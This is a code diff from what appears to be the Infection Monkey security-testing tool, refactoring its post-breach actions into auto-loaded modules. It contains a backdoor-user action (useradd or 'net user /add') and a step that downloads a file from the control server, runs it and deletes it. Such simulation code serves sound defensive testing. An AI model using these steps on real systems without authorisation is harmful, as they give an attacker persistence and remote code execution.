diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 503284ca2..97b66690e 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -20,7 +20,6 @@ class Configuration(object): # now we won't work at <2.7 for sure network_import = importlib.import_module('infection_monkey.network') exploit_import = importlib.import_module('infection_monkey.exploit') - post_breach_import = importlib.import_module('infection_monkey.post_breach') unknown_items = [] for key, value in formatted_data.items(): @@ -37,9 +36,6 @@ class Configuration(object): elif key == 'exploiter_classes': class_objects = [getattr(exploit_import, val) for val in value] setattr(self, key, class_objects) - elif key == 'post_breach_actions': - class_objects = [getattr(post_breach_import, val) for val in value] - setattr(self, key, class_objects) else: if hasattr(self, key): setattr(self, key, value) diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index df6b21228..3fae277e8 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -20,6 +20,8 @@ requests.packages.urllib3.disable_warnings() LOG = logging.getLogger(__name__) DOWNLOAD_CHUNK = 1024 +PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s" + # random number greater than 5, # to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere. TIMEOUT_IN_SECONDS = 15 @@ -307,3 +309,13 @@ class ControlClient(object): target_addr, target_port = None, None return tunnel.MonkeyTunnel(proxy_class, target_addr=target_addr, target_port=target_port) + + @staticmethod + def get_pba_file(filename): + try: + return requests.get(PBA_FILE_DOWNLOAD % + (WormConfiguration.current_server, filename), + verify=False, + proxies=ControlClient.proxies) + except requests.exceptions.RequestException: + return False diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 836b4997a..912386d4c 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -121,10 +121,7 @@ class InfectionMonkey(object): system_info = system_info_collector.get_info() ControlClient.send_telemetry("system_info_collection", system_info) - for action_class in WormConfiguration.post_breach_actions: - action = action_class() - action.act() - + # Executes post breach actions PostBreach().execute() if 0 == WormConfiguration.depth: diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index a7f0f0396..d29adddb1 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -15,7 +15,7 @@ def main(): a = Analysis(['main.py'], pathex=['..'], hiddenimports=get_hidden_imports(), - hookspath=None, + hookspath=['./pyinstaller_hooks'], runtime_hooks=None, binaries=None, datas=None, diff --git a/monkey/infection_monkey/post_breach/__init__.py b/monkey/infection_monkey/post_breach/__init__.py index 2bd5547b4..3a692dc66 100644 --- a/monkey/infection_monkey/post_breach/__init__.py +++ b/monkey/infection_monkey/post_breach/__init__.py @@ -1,4 +1 @@ __author__ = 'danielg' - - -from add_user import BackdoorUser diff --git a/monkey/infection_monkey/post_breach/actions/__init__.py b/monkey/infection_monkey/post_breach/actions/__init__.py new file mode 100644 index 000000000..17007f1e6 --- /dev/null +++ b/monkey/infection_monkey/post_breach/actions/__init__.py @@ -0,0 +1,11 @@ +from os.path import dirname, basename, isfile, join +import glob + + +def get_pba_files(): + """ + Gets all files under current directory(/actions) + :return: list of all files without .py ending + """ + files = glob.glob(join(dirname(__file__), "*.py")) + return [basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')] diff --git a/monkey/infection_monkey/post_breach/actions/add_user.py b/monkey/infection_monkey/post_breach/actions/add_user.py new file mode 100644 index 000000000..650f37b2f --- /dev/null +++ b/monkey/infection_monkey/post_breach/actions/add_user.py @@ -0,0 +1,19 @@ +import datetime +from infection_monkey.post_breach.pba import PBA +from infection_monkey.config import WormConfiguration + + +__author__ = 'danielg' + +LINUX_COMMANDS = ['useradd', '-M', '--expiredate', + datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER', + WormConfiguration.user_to_add] + +WINDOWS_COMMANDS = ['net', 'user', WormConfiguration.user_to_add, + WormConfiguration.remote_user_pass, + '/add', '/ACTIVE:NO'] + + +class BackdoorUser(PBA): + def __init__(self): + super(BackdoorUser, self).__init__("Backdoor user", linux_cmd=LINUX_COMMANDS, windows_cmd=WINDOWS_COMMANDS) diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py new file mode 100644 index 000000000..61ec6f5d7 --- /dev/null +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -0,0 +1,91 @@ +import os +import logging + +from infection_monkey.utils import is_windows_os +from infection_monkey.post_breach.pba import PBA +from infection_monkey.control import ControlClient +from infection_monkey.config import WormConfiguration +from infection_monkey.utils import get_monkey_dir_path + +LOG = logging.getLogger(__name__) + +__author__ = 'VakarisZ' + +# Default commands for executing PBA file and then removing it +DEFAULT_LINUX_COMMAND = "chmod +x {0} ; {0} ; rm {0}" +DEFAULT_WINDOWS_COMMAND = "{0} & del {0}" + +DIR_CHANGE_WINDOWS = 'cd %s & ' +DIR_CHANGE_LINUX = 'cd %s ; ' + + +class UsersPBA(PBA): + """ + Defines user's configured post breach action. + """ + def __init__(self): + super(UsersPBA, self).__init__("File execution") + self.filename = '' + if not is_windows_os(): + # Add linux commands to PBA's + if WormConfiguration.PBA_linux_filename: + if WormConfiguration.custom_PBA_linux_cmd: + # Add change dir command, because user will try to access his file + self.command = (DIR_CHANGE_LINUX % get_monkey_dir_path()) + WormConfiguration.custom_PBA_linux_cmd + self.filename = WormConfiguration.PBA_linux_filename + else: + file_path = os.path.join(get_monkey_dir_path(), WormConfiguration.PBA_linux_filename) + self.command = DEFAULT_LINUX_COMMAND.format(file_path) + self.filename = WormConfiguration.PBA_linux_filename + elif WormConfiguration.custom_PBA_linux_cmd: + self.command = WormConfiguration.custom_PBA_linux_cmd + else: + # Add windows commands to PBA's + if WormConfiguration.PBA_windows_filename: + if WormConfiguration.custom_PBA_windows_cmd: + # Add change dir command, because user will try to access his file + self.command = (DIR_CHANGE_WINDOWS % get_monkey_dir_path()) + WormConfiguration.custom_PBA_windows_cmd + self.filename = WormConfiguration.PBA_windows_filename + else: + file_path = os.path.join(get_monkey_dir_path(), WormConfiguration.PBA_windows_filename) + self.command = DEFAULT_WINDOWS_COMMAND.format(file_path) + self.filename = WormConfiguration.PBA_windows_filename + elif WormConfiguration.custom_PBA_windows_cmd: + self.command = WormConfiguration.custom_PBA_windows_cmd + + def _execute_default(self): + if self.filename: + UsersPBA.download_pba_file(get_monkey_dir_path(), self.filename) + return super(UsersPBA, self)._execute_default() + + @staticmethod + def should_run(class_name): + if not is_windows_os(): + if WormConfiguration.PBA_linux_filename or WormConfiguration.custom_PBA_linux_cmd: + return True + else: + if WormConfiguration.PBA_windows_filename or WormConfiguration.custom_PBA_windows_cmd: + return True + return False + + @staticmethod + def download_pba_file(dst_dir, filename): + """ + Handles post breach action file download + :param dst_dir: Destination directory + :param filename: Filename + :return: True if successful, false otherwise + """ + + pba_file_contents = ControlClient.get_pba_file(filename) + + if not pba_file_contents or not pba_file_contents.content: + LOG.error("Island didn't respond with post breach file.") + return False + try: + with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file: + written_PBA_file.write(pba_file_contents.content) + return True + except IOError as e: + LOG.error("Can not upload post breach file to target machine: %s" % e) + return False diff --git a/monkey/infection_monkey/post_breach/add_user.py b/monkey/infection_monkey/post_breach/add_user.py deleted file mode 100644 index 94aa210e4..000000000 --- a/monkey/infection_monkey/post_breach/add_user.py +++ /dev/null @@ -1,52 +0,0 @@ -import datetime -import logging -import subprocess -import sys -from infection_monkey.config import WormConfiguration - -LOG = logging.getLogger(__name__) - -# Linux doesn't have WindowsError -try: - WindowsError -except NameError: - WindowsError = None - -__author__ = 'danielg' - - -class BackdoorUser(object): - """ - This module adds a disabled user to the system. - This tests part of the ATT&CK matrix - """ - - def act(self): - LOG.info("Adding a user") - try: - if sys.platform.startswith("win"): - retval = self.add_user_windows() - else: - retval = self.add_user_linux() - if retval != 0: - LOG.warn("Failed to add a user") - else: - LOG.info("Done adding user") - except OSError: - LOG.exception("Exception while adding a user") - - @staticmethod - def add_user_linux(): - cmd_line = ['useradd', '-M', '--expiredate', - datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER', - WormConfiguration.user_to_add] - retval = subprocess.call(cmd_line) - return retval - - @staticmethod - def add_user_windows(): - cmd_line = ['net', 'user', WormConfiguration.user_to_add, - WormConfiguration.remote_user_pass, - '/add', '/ACTIVE:NO'] - retval = subprocess.call(cmd_line) - return retval diff --git a/monkey/infection_monkey/post_breach/file_execution.py b/monkey/infection_monkey/post_breach/file_execution.py deleted file mode 100644 index 5f52a29a6..000000000 --- a/monkey/infection_monkey/post_breach/file_execution.py +++ /dev/null @@ -1,68 +0,0 @@ -from infection_monkey.post_breach.pba import PBA -from infection_monkey.control import ControlClient -from infection_monkey.config import WormConfiguration -from infection_monkey.utils import get_monkey_dir_path -import requests -import os -import logging - -LOG = logging.getLogger(__name__) - -__author__ = 'VakarisZ' - -# Default commands for executing PBA file and then removing it -DEFAULT_LINUX_COMMAND = "chmod +x {0} ; {0} ; rm {0}" -DEFAULT_WINDOWS_COMMAND = "{0} & del {0}" - - -class FileExecution(PBA): - """ - Defines user's file execution post breach action. - """ - def __init__(self, linux_command="", windows_command=""): - self.linux_filename = WormConfiguration.PBA_linux_filename - self.windows_filename = WormConfiguration.PBA_windows_filename - super(FileExecution, self).__init__("File execution", linux_command, windows_command) - - def _execute_linux(self): - FileExecution.download_PBA_file(get_monkey_dir_path(), self.linux_filename) - return super(FileExecution, self)._execute_linux() - - def _execute_win(self): - FileExecution.download_PBA_file(get_monkey_dir_path(), self.windows_filename) - return super(FileExecution, self)._execute_win() - - def add_default_command(self, is_linux): - """ - Replaces current (likely empty) command with default file execution command (that changes permissions, executes - and finally deletes post breach file). - Default commands are defined as globals in this module. - :param is_linux: Boolean that indicates for which OS the command is being set. - """ - if is_linux: - file_path = os.path.join(get_monkey_dir_path(), self.linux_filename) - self.linux_command = DEFAULT_LINUX_COMMAND.format(file_path) - else: - file_path = os.path.join(get_monkey_dir_path(), self.windows_filename) - self.windows_command = DEFAULT_WINDOWS_COMMAND.format(file_path) - - @staticmethod - def download_PBA_file(dst_dir, filename): - """ - Handles post breach action file download - :param dst_dir: Destination directory - :param filename: Filename - :return: True if successful, false otherwise - """ - - PBA_file_contents = requests.get("https://%s/api/pba/download/%s" % - (WormConfiguration.current_server, filename), - verify=False, - proxies=ControlClient.proxies) - try: - with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file: - written_PBA_file.write(PBA_file_contents.content) - return True - except IOError as e: - LOG.error("Can not download post breach file to target machine, because %s" % e) - return False diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py index 09fe613b3..7df3693fa 100644 --- a/monkey/infection_monkey/post_breach/pba.py +++ b/monkey/infection_monkey/post_breach/pba.py @@ -1,7 +1,10 @@ import logging -from infection_monkey.control import ControlClient import subprocess import socket +from infection_monkey.control import ControlClient +from infection_monkey.utils import is_windows_os +from infection_monkey.config import WormConfiguration + LOG = logging.getLogger(__name__) @@ -12,57 +15,60 @@ class PBA(object): """ Post breach action object. Can be extended to support more than command execution on target machine. """ - def __init__(self, name="unknown", linux_command="", windows_command=""): + def __init__(self, name="unknown", linux_cmd="", windows_cmd=""): """ :param name: Name of post breach action. - :param linux_command: Command that will be executed on linux machine - :param windows_command: Command that will be executed on windows machine + :param command: Command that will be executed on breached machine """ - self.linux_command = linux_command - self.windows_command = windows_command + self.command = PBA.choose_command(linux_cmd, windows_cmd) self.name = name - def run(self, is_linux): + def get_pba(self): """ - Runs post breach action command - :param is_linux: boolean that indicates on which os monkey is running + This method returns a PBA object based on a worm's configuration. + Return None or False if you don't want the pba to be executed. + :return: A pba object. """ - if is_linux: - command = self.linux_command - exec_funct = self._execute_linux - else: - command = self.windows_command - exec_funct = self._execute_win - if command: - hostname = socket.gethostname() - ControlClient.send_telemetry('post_breach', {'command': command, - 'result': exec_funct(), - 'name': self.name, - 'hostname': hostname, - 'ip': socket.gethostbyname(hostname) - }) - - def _execute_linux(self): - """ - Default linux PBA execution function. Override it if additional functionality is needed - """ - return self._execute_default(self.linux_command) - - def _execute_win(self): - """ - Default linux PBA execution function. Override it if additional functionality is needed - """ - return self._execute_default(self.windows_command) + return self @staticmethod - def _execute_default(command): + def should_run(class_name): + """ + Decides if post breach action is enabled in config + :return: True if it needs to be ran, false otherwise + """ + return class_name in WormConfiguration.post_breach_actions + + def run(self): + """ + Runs post breach action command + """ + exec_funct = self._execute_default + result = exec_funct() + hostname = socket.gethostname() + ControlClient.send_telemetry('post_breach', {'command': self.command, + 'result': result, + 'name': self.name, + 'hostname': hostname, + 'ip': socket.gethostbyname(hostname)}) + + def _execute_default(self): """ Default post breach command execution routine - :param command: What command to execute :return: Tuple of command's output string and boolean, indicating if it succeeded """ try: - return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True), True + return subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True), True except subprocess.CalledProcessError as e: # Return error output of the command return e.output, False + + @staticmethod + def choose_command(linux_cmd, windows_cmd): + """ + Helper method that chooses between linux and windows commands. + :param linux_cmd: + :param windows_cmd: + :return: Command for current os + """ + return windows_cmd if is_windows_os() else linux_cmd diff --git a/monkey/infection_monkey/post_breach/post_breach_handler.py b/monkey/infection_monkey/post_breach/post_breach_handler.py index ff24ebbbb..8522f412f 100644 --- a/monkey/infection_monkey/post_breach/post_breach_handler.py +++ b/monkey/infection_monkey/post_breach/post_breach_handler.py @@ -1,16 +1,15 @@ import logging -import infection_monkey.config -from file_execution import FileExecution -from pba import PBA +import inspect +import importlib +from infection_monkey.post_breach.pba import PBA +from infection_monkey.post_breach.actions import get_pba_files from infection_monkey.utils import is_windows_os -from infection_monkey.utils import get_monkey_dir_path LOG = logging.getLogger(__name__) __author__ = 'VakarisZ' -DIR_CHANGE_WINDOWS = 'cd %s & ' -DIR_CHANGE_LINUX = 'cd %s ; ' +PATH_TO_ACTIONS = "infection_monkey.post_breach.actions." class PostBreach(object): @@ -19,65 +18,34 @@ class PostBreach(object): """ def __init__(self): self.os_is_linux = not is_windows_os() - self.pba_list = self.config_to_pba_list(infection_monkey.config.WormConfiguration) + self.pba_list = self.config_to_pba_list() def execute(self): """ Executes all post breach actions. """ for pba in self.pba_list: - pba.run(self.os_is_linux) + pba.run() LOG.info("Post breach actions executed") @staticmethod - def config_to_pba_list(config): + def config_to_pba_list(): """ - Returns a list of PBA objects generated from config. - :param config: Monkey configuration + Passes config to each post breach action class and aggregates results into a list. :return: A list of PBA objects. """ pba_list = [] - pba_list.extend(PostBreach.get_custom_PBA(config)) - + pba_files = get_pba_files() + # Go through all of files in ./actions + for pba_file in pba_files: + # Import module from that file + module = importlib.import_module(PATH_TO_ACTIONS + pba_file) + # Get all classes in a module + pba_classes = [m[1] for m in inspect.getmembers(module, inspect.isclass) + if ((m[1].__module__ == module.__name__) and issubclass(m[1], PBA))] + # Get post breach action object from class + for pba_class in pba_classes: + if pba_class.should_run(pba_class.__name__): + pba = pba_class() + pba_list.append(pba) return pba_list - - @staticmethod - def get_custom_PBA(config): - """ - Creates post breach actions depending on users input into 'custom post breach' config section - :param config: monkey's configuration - :return: List of PBA objects ([user's file execution PBA, user's command execution PBA]) - """ - custom_list = [] - file_pba = FileExecution() - command_pba = PBA(name="Custom") - - if not is_windows_os(): - # Add linux commands to PBA's - if config.PBA_linux_filename: - if config.custom_PBA_linux_cmd: - # Add change dir command, because user will try to access his file - file_pba.linux_command = (DIR_CHANGE_LINUX % get_monkey_dir_path()) + config.custom_PBA_linux_cmd - else: - file_pba.add_default_command(is_linux=True) - elif config.custom_PBA_linux_cmd: - command_pba.linux_command = config.custom_PBA_linux_cmd - else: - # Add windows commands to PBA's - if config.PBA_windows_filename: - if config.custom_PBA_windows_cmd: - # Add change dir command, because user will try to access his file - file_pba.windows_command = (DIR_CHANGE_WINDOWS % get_monkey_dir_path()) + \ - config.custom_PBA_windows_cmd - else: - file_pba.add_default_command(is_linux=False) - elif config.custom_PBA_windows_cmd: - command_pba.windows_command = config.custom_PBA_windows_cmd - - # Add PBA's to list - if file_pba.linux_command or file_pba.windows_command: - custom_list.append(file_pba) - if command_pba.windows_command or command_pba.linux_command: - custom_list.append(command_pba) - - return custom_list diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py new file mode 100644 index 000000000..51a0fca4a --- /dev/null +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py @@ -0,0 +1,6 @@ +from PyInstaller.utils.hooks import collect_submodules, collect_data_files + +# Import all actions as modules +hiddenimports = collect_submodules('infection_monkey.post_breach.actions') +# Add action files that we enumerate +datas = (collect_data_files('infection_monkey.post_breach.actions', include_py_files=True)) diff --git a/monkey/monkey_island/cc/resources/monkey.py b/monkey/monkey_island/cc/resources/monkey.py index 0207709eb..2f464f068 100644 --- a/monkey/monkey_island/cc/resources/monkey.py +++ b/monkey/monkey_island/cc/resources/monkey.py @@ -10,7 +10,7 @@ from monkey_island.cc.models.monkey_ttl import MonkeyTtl from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.node import NodeService -MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS = 120 +MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS = 60 * 5 __author__ = 'Barak' diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index de29da4e6..44d5a9a2b 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -21,7 +21,7 @@ class ConfigurePageComponent extends AuthComponent { this.initialConfig = {}; this.initialAttackConfig = {}; this.sectionsOrder = ['attack', 'basic', 'basic_network', 'monkey', 'cnc', 'network', 'exploits', 'internal']; - this.uiSchemas = ConfigurePageComponent.getUiSchemas(); + this.uiSchemas = this.getUiSchemas(); // set schema from server this.state = { schema: {}, @@ -37,7 +37,7 @@ class ConfigurePageComponent extends AuthComponent { }; } - static getUiSchemas(){ + getUiSchemas(){ return ({ basic: {"ui:order": ["general", "credentials"]}, basic_network: {}, @@ -299,9 +299,8 @@ class ConfigurePageComponent extends AuthComponent { try { this.setState({ configuration: JSON.parse(event.target.result), - selectedSection: 'basic', lastAction: 'import_success' - }, () => {this.sendConfig()}); + }, () => {this.sendConfig(); this.setInitialConfig(JSON.parse(event.target.result))}); this.currentSection = 'basic'; this.currentFormData = {}; } catch(SyntaxError) { diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/PostBreach.js b/monkey/monkey_island/cc/ui/src/components/report-components/PostBreach.js index 763b35de8..aacdc8845 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/PostBreach.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/PostBreach.js @@ -2,7 +2,7 @@ import React from 'react'; import ReactTable from 'react-table' let renderArray = function(val) { - return {val.map(x => {x})}; + return {val.map(x => {x})}; }; let renderIpAddresses = function (val) { @@ -36,7 +36,7 @@ let renderDetails = function (data) { columns={subColumns} defaultPageSize={defaultPageSize} showPagination={showPagination} - style={{"background-color": "#ededed"}} + style={{"backgroundColor": "#ededed"}} /> };